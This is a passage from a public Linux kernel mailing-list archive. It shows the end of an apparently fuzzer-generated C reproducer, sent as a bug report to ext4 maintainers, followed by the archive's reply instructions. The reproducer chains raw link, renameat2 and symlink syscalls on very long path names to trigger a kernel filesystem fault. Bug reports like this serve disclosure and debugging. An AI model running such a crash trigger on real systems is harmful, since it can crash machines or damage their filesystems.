"file0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\000",
253);
syscall(__NR_link, /*old=*/0x20000940ul, /*new=*/0x20000d40ul);
memcpy((void*)0x20001240, "./file0\000", 8);
memcpy((void*)0x20000bc0,
"./"
"file0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\000",
257);
syscall(__NR_link, /*old=*/0x20001240ul, /*new=*/0x20000bc0ul);
memcpy((void*)0x20000200, "./bus\000", 6);
syscall(__NR_openat, /*fd=*/0xffffff9c, /*file=*/0x20000200ul,
/*flags=O_NONBLOCK|O_NOCTTY|O_NOATIME|O_CREAT|O_RDWR*/ 0x40942ul,
/*mode=*/0ul);
memcpy((void*)0x20000000, ".\000", 2);
res = syscall(__NR_openat, /*fd=*/0xffffffffffffff9cul, /*file=*/0x20000000ul,
/*flags=*/0ul, /*mode=*/0ul);
if (res != -1)
r[0] = res;
memcpy((void*)0x20000380, "./bus\000", 6);
memcpy((void*)0x20000400, "./file1\000", 8);
syscall(__NR_renameat2, /*oldfd=*/r[0], /*old=*/0x20000380ul, /*newfd=*/r[0],
/*new=*/0x20000400ul, /*flags=*/0ul);
memcpy((void*)0x20001640,
"./"
"file0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/../file0\000",
260);
memcpy((void*)0x20000e40,
"./"
"file0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\000",
251);
syscall(__NR_symlink, /*old=*/0x20001640ul, /*new=*/0x20000e40ul);
return 0;
}
reply other threads:[~2024-04-30 1:22 UTC|newest]
Thread overview: [no followups] expand[flat|nested] mbox.gz Atom feed
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=b4f743e5-ad5b-48cf-827b-e3da9bb448a2.bugreport@ubisectech.com \
--to=bugreport@ubisectech.com \
--cc=adilger.kernel@dilger.ca \
--cc=linux-kernel@vger.kernel.org \
--cc=linux-trace-kernel@vger.kernel.org \
--cc=tytso@mit.edu \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.